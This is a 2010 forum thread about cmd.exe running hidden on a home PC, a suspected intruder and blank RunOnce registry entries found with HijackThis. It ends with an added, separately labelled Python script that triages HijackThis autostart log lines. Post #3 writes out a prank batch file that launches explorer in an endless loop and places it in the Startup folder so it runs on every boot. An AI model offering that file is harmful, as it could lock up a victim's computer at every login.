SUBSIM Radio Room Forums



12-25-10, 06:52 PM   #1
Castout
Will cmd.exe run without user action?

Does it need any internet connection on a clean system? Because if not, I intend to block its internet access. And could it run itself from time to time without user action when the system is idle (no usage)?


Just curious

I know it's the command prompt. I found out that it was trying to run in the background. Avira, Malwarebytes and Threatfire scans all found nothing on my system.

12-25-10, 10:01 PM   #2
Madox58

Command windows can run hidden.
Something is launching it as it should never start on its own.
And never hidden like you posted.

I'd run 'Hijack This' and get a report of what is Starting up when you
power up your system.

I can think of several reasons it would run at start up, then not shut down.

12-25-10, 11:07 PM   #3
the_tyrant

try this!

in notepad, input this:
@echo off
:a
explorer
goto a

save the above 4 lines as a batch (.bat) file

drag it in (the folders are hidden)
C:\Documents and Settings\(user)\Start Menu\Programs\Startup (if you're using xp)
or

C:\users\(user)\AppData\Roaming\Microsoft\Windows\Start Menu (if you're using vista)

C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (if you're using windows 7)

restart and you shall feel the power of the batch file!

Don't actually though

anyways, command prompt popping up can be because you are running programs based in command prompt (telnet, ping, nmap, etc)
or it can be because you are running batch files

of course, it could be some really clumsy hacker
__________________
My own open source project on Sourceforge
OTP.net KGB grade encryption for the rest of us

12-26-10, 02:11 AM   #4
Castout

Yeah it was a hacker.

He hacked into my system and created an account for himself, which I got rid of before, but he's getting smarter: the hacked reg entries won't show on the Hijack This list, but they will show up if you copy and paste the log . . . . .

He made the gadgets inaccessible and made my PC abruptly power off and unable to start.

Guess it was a Christmas present. I'm sure there's more to come

12-26-10, 05:00 PM   #5
Castout

Quote:
Originally Posted by MaddogK
nice to know, but keep in mind some apps do actually start a cmd window when executed in order to perform certain tasks. This is a classic example of why one should not run with admin rights all the time.

Yeah I'm not sure if it was a hacker but my gadgets became inaccessible and I found new suspicious registry entries while no other new software has been installed.

The following 2:
O4 - HKUS\S-1-5-18\..\RunOnce: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [] (User 'Default user')

I found them on an earlier scan and already deleted them and confirmed they were deleted, but they were back yesterday. They were not listed on the HijackThis list except if you copy and paste the log file. In fact they didn't show in the log file either, but if you copy and paste the log file they will get shown.

I don't think I have any app that's using cmd.exe.
Funny thing, the log showed the cmd.exe came from a folder which I could not find even after I had already unhidden all hidden folders and files.

12-27-10, 02:16 AM   #6
Castout

Can anybody suggest whether the following two entries exist in their Windows 7 HijackThis list?

Or are they part of malware?

The following 2:
O4 - HKUS\S-1-5-18\..\RunOnce: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [] (User 'Default user')

Please, the last thing I want is to ruin my Seven installation. I already deleted them and am now wondering.
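
Added example, not part of the thread and not HijackThis code: a small Python triage of O4 (autostart) log lines like the two quoted in posts #5 and #6. It relies on the fact that HKEY_USERS\.DEFAULT is the LocalSystem account's hive, the same one as HKEY_USERS\S-1-5-18, so the two quoted lines point at one registry value. The regex, function names and the first two sample lines are assumptions constructed for illustration.

```python
import re

# HijackThis O4 (autostart) line: hive, optional per-user subkey, key name,
# [value name], command, optional "(User '...')" suffix. The pattern is an
# assumption modelled on the two lines quoted in the thread.
O4_RE = re.compile(
    r"^O4 - (?P<hive>HK[A-Z]+)\\(?:(?P<sub>[^\\]+)\\)?\.\.\\(?P<key>[^:]+): "
    r"\[(?P<name>[^\]]*)\]\s*(?P<cmd>.*?)\s*(?:\(User '(?P<user>[^']*)'\))?$"
)
# HKU\.DEFAULT and HKU\S-1-5-18 are the same hive (the LocalSystem profile).
SYSTEM_ALIASES = {"S-1-5-18", ".DEFAULT"}

# Last two lines are from the thread; the first two are constructed samples.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [ExampleApp] "C:\Program Files\ExampleApp\app.exe" /tray
O4 - HKCU\..\Run: [ExampleTask] cmd.exe /c "C:\Example\task.bat"
O4 - HKUS\S-1-5-18\..\RunOnce: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [] (User 'Default user')
"""

def parse_o4(line):
    """Return the fields of one O4 line as a dict, or None if it is not O4."""
    m = O4_RE.match(line.strip())
    if m is None:
        return None
    entry = m.groupdict()
    owner = "SYSTEM" if entry["sub"] in SYSTEM_ALIASES else (entry["sub"] or entry["hive"])
    entry["location"] = (owner, entry["key"], entry["name"])
    return entry

def triage(lines):
    """Return (line, notes) per O4 entry; notes list what deserves a closer look."""
    seen, findings = set(), []
    for line in lines:
        entry = parse_o4(line)
        if entry is None:
            continue
        notes = []
        if entry["location"] in seen:
            notes.append("same registry value as an earlier line (hive alias)")
        seen.add(entry["location"])
        if not entry["name"] and not entry["cmd"]:
            notes.append("blank name and command: inspect the key directly")
        if re.search(r"\bcmd(\.exe)?\b", entry["cmd"], re.I):
            notes.append("starts cmd.exe")
        findings.append((line.strip(), notes))
    return findings

if __name__ == "__main__":
    for line, notes in triage(SAMPLE_LOG.splitlines()):
        print(line, "->", "; ".join(notes) or "nothing flagged")
```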
All times are GMT -5. The time now is 06:33 AM.